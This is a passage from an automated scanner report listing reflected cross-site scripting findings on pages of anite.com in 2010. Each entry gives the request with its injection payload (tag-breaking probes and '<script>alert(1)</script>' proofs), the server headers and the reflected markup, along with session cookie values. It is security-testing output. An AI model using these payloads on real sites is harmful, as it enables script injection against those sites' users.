Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/428ee"><script>alert(1)</script>c033c7315fd#up">
...[SNIP]...

1.15. http://anite.com/anite-and-huawei-accelerate-availability-of-td-lte.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-huawei-accelerate-availability-of-td-lte.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73062"><a>0097756d8a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-huawei-accelerate-availability-of-td-lte.html?73062"><a>0097756d8a6=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-huawei-accelerate-availability-of-td-lte.html?73062"><a>0097756d8a6=1#up">
...[SNIP]...

1.16. http://anite.com/anite-and-lg-electronics-verify-the-first-lte-conformance.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-lg-electronics-verify-the-first-lte-conformance.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37bab"><a>a22c6c179ef was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-lg-electronics-verify-the-first-lte-conformance.html?Itemid=22837bab"><a>a22c6c179ef&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-lg-electronics-verify-the-first-lte-conformance.html?Itemid=22837bab"><a>a22c6c179ef&nomore=true#up">
...[SNIP]...

1.17. http://anite.com/anite-and-lg-electronics-verify-the-first-lte-conformance.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-and-lg-electronics-verify-the-first-lte-conformance.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb85"><script>alert(1)</script>7e77b196d05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cfb85"><script>alert(1)</script>7e77b196d05 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/cfb85"><script>alert(1)</script>7e77b196d05#up">
...[SNIP]...

1.18. http://anite.com/anite-and-lg-electronics-verify-the-first-lte-conformance.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-lg-electronics-verify-the-first-lte-conformance.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c55cd"><a>42e91a97ea9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-lg-electronics-verify-the-first-lte-conformance.html?c55cd"><a>42e91a97ea9=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-lg-electronics-verify-the-first-lte-conformance.html?c55cd"><a>42e91a97ea9=1#up">
...[SNIP]...

1.19. http://anite.com/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8531"><a>4a1d3912bb4 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html?Itemid=228b8531"><a>4a1d3912bb4&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html?Itemid=228b8531"><a>4a1d3912bb4&nomore=true#up">
...[SNIP]...

1.20. http://anite.com/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b256"><script>alert(1)</script>720ade62f35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3b256"><script>alert(1)</script>720ade62f35 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/3b256"><script>alert(1)</script>720ade62f35#up">
...[SNIP]...

1.21. http://anite.com/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa80"><a>5ca6d4c8f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html?caa80"><a>5ca6d4c8f99=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-blue-wonder-and-4m-wireless-showcase-lte-interoperability.html?caa80"><a>5ca6d4c8f99=1#up">
...[SNIP]...

1.22. http://anite.com/anite-conformance-toolset-is-an-undisputed-leader.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-conformance-toolset-is-an-undisputed-leader.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f59"><a>c17ad55ba79 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-conformance-toolset-is-an-undisputed-leader.html?Itemid=22898f59"><a>c17ad55ba79&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-conformance-toolset-is-an-undisputed-leader.html?Itemid=22898f59"><a>c17ad55ba79&nomore=true#up">
...[SNIP]...

1.23. http://anite.com/anite-conformance-toolset-is-an-undisputed-leader.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-conformance-toolset-is-an-undisputed-leader.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b31"><script>alert(1)</script>f17f0b502d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f8b31"><script>alert(1)</script>f17f0b502d7 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/f8b31"><script>alert(1)</script>f17f0b502d7#up">
...[SNIP]...

1.24. http://anite.com/anite-conformance-toolset-is-an-undisputed-leader.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-conformance-toolset-is-an-undisputed-leader.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5f8"><a>45d21f69dfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-conformance-toolset-is-an-undisputed-leader.html?da5f8"><a>45d21f69dfd=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-conformance-toolset-is-an-undisputed-leader.html?da5f8"><a>45d21f69dfd=1#up">
...[SNIP]...

1.25. http://anite.com/anite-corporate-social-responsibility-princestrust.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-corporate-social-responsibility-princestrust.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e420"><script>alert(1)</script>76e5e6605e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4e420"><script>alert(1)</script>76e5e6605e4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:20:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/4e420"><script>alert(1)</script>76e5e6605e4#up">
...[SNIP]...

1.26. http://anite.com/anite-corporate-social-responsibility-princestrust.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-corporate-social-responsibility-princestrust.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e45"><a>5045f616d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-corporate-social-responsibility-princestrust.html?92e45"><a>5045f616d38=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-corporate-social-responsibility-princestrust.html?92e45"><a>5045f616d38=1#up">
...[SNIP]...

1.27. http://anite.com/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e96"><a>dc7dc87d3f8 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html?Itemid=228f5e96"><a>dc7dc87d3f8&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html?Itemid=228f5e96"><a>dc7dc87d3f8&nomore=true#up">
...[SNIP]...

1.28. http://anite.com/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38623"><script>alert(1)</script>e4386186de0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /38623"><script>alert(1)</script>e4386186de0 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/38623"><script>alert(1)</script>e4386186de0#up">
...[SNIP]...

1.29. http://anite.com/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html

Issue detail

